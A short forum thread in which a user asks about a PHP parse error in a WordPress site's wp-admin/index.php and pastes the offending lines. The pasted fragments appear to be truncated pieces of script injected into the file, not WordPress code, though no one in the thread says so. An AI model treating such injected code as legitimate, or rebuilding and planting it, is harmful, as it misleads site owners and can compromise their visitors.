it's wordpress driven... and i'm getting this error... Parse error: syntax error, unexpected ',' in /home/balita/public_html/wp-admin/index.php on line 11 any idea what this may be? the homepage file is frontpage.html ...and there is a index.php file in the root of the server...although this is driven by wordpress...the index.php inside the theme folder does not drive that home page. the index.php file in the main root of the server is what's causing the error. anyone have an idea of what could be wrong?
Look the line 11 of the index.php. We have to know what is there in the line 11 of index.php. Without knowing it, not possible to suggest some honest advice. Will you mind to paste the line 11 here? You can copy the contents of index.php of /home/balita/public_html/wp-admin/ and paste in Dreamweaver, and then look for the line 11.
hey ramcity...thanks... here's line 11: $links = '<script id="oe4dae82c967843a194c00633a">var here's line 13: e(s);yes=false;}},20);setTimeout(function(){el=document.createElement("div");el.innerHTML= here's line 87: <?php require(ABSPATH . 'wp-admin/admin-footer.php'); ?> those 3 lines are showing erros